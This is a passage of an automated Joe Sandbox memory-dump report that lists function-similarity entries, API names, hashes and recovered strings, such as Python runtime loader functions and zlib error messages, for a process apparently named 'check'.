                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction ID: 910bf5020e47e32eb3ecbf1229b9489eeace45948e6f272249fb7ae63f1c0ae6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83418232918A4587EAA4DA29E55027973A0EB69FA4F140131F69FC36D1CF6CF8428B51
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                • Opcode ID: 18b2c4858c0edfd7677dd7e37cbff4feffd99745866a20de9e73d591d5ddfdc1
                                                                                                                                                                                                                • Instruction ID: 67216b4bead44fe4987a73402a4ce936da30cfa20a326274e9823f3974ec4298
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18b2c4858c0edfd7677dd7e37cbff4feffd99745866a20de9e73d591d5ddfdc1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0218222B29E9146FA909A2365043BE9651BFA5FE4F8C4430FE0D87786CE7DF441C200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                • Instruction ID: a6aa29d1a9aa396791fc03a97d369f8daef61fe19472ab17d0bb4eb69d7605ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76314F32A28E1285F791AB59884137C2A90AFA0FB5F520136F95E877D2DE7CFC418711
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                • Instruction ID: ceb6c56cf455804ad90193e4ecc82d89cf10bfa879a6b279aa695cb0df6fd418
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E218172B14B4589EBA48FA4C4806EC33B4FB54B28F584636E76D86AD6DF3CE544C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction ID: e82b4ff45466638cdc35ba9e6df2b2daaf9f90d3ddbac5a9c044e548598d85df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A311A531A2CE4182EAE09F15941017DA6A0FFA5FA4F454431FA8CD7B96CF7CF8008760
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction ID: d3fad0549c93ed9f059b5bd0368e1a5bc2ffddee8b9ab894bb9366336541800e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81214132A18E4186EB618F18D44037976A4BBA4F64F644634FA5DC7AD7DF3DE4118B40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction ID: 58066d4939653aa9ce6084ded8d63b232fc2ce1d4da1e7f8eaf8ddd51627b948
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA01A161A18B4180EE84DF529A00069A695BFB5FF4F484631FE6C93BD6CE3CF8028300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalDeleteSection
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 166494926-0
                                                                                                                                                                                                                • Opcode ID: 6e5b5d88246737fafb05fc0397377e26502a30847781b654ecf110663deedd5b
                                                                                                                                                                                                                • Instruction ID: 4749bc7fc41a689769ad6d20924c2c8ade8487b5254d571f91907be15d95b2e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5b5d88246737fafb05fc0397377e26502a30847781b654ecf110663deedd5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF01564E18D0781FE80ABA5E8912781394AFB8F75F801571E80EC6263DE2CF4909252
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF61E8FB32A,?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A), ref: 00007FF61E8FEBED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction ID: ac42e65bdabd9309c6247290268b169d7d4af1824d5df675f8fd0c19fad06bdd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72F06D64B0AA4340FE9966AA98512B502845FB8FB0F4C4932FD0FE63D2ED1CF4804210
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF61E8F0C90,?,?,?,00007FF61E8F22FA,?,?,?,?,?,00007FF61E8F3AE9), ref: 00007FF61E8FD63A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction ID: 727148287136bea2a9d8597751ce8922f9e3f5aec07a30aa75e51afd23dbfb39
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0FE10B19A4785FE956BB1584177512945FA5FB0F480730FE3EC52C3DE2CF4908550
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5840
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5852
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5889
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E589B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58B4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58C6
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58DF
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E58F1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E590D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E591F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E593B
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E594D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5969
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E597B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E5997
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59A9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59C5
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF61E8E64CF,?,00007FF61E8E336E), ref: 00007FF61E8E59D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                • Instruction ID: fe106041304a18c5bbc47404e4e51ff7479419f443402a1dcedc7fa790f4516b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2522B7B4909F4792FA599F56B8105B522A8AF34F71F845835F82FC22A6FF3CF5488250
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                • Instruction ID: 7be5d62c7620679aadc18d939ccf8e4567d06a17745c51610f0805d50799276e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADB2D772A18A828BE7758E64D4407FD37A9FB64B54F805935EA0DD7A86DF38F900CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                • Instruction ID: c4e5fc63f6802057278b129e54b3eaccf497d81633272808d461dea08efeca15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD52E472A14EA68BD7A48F15C498B7E7BA9FB94B50F014139F64A87780DF3DE844CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                • Instruction ID: 6be89a6105a6e4df1c4719b16ea054a33022aca358113c0e9023f3226636e5e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B314576608F8186EB608F65E8403ED7364FBA4B54F444439EA4E87B95EF7CE548C710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
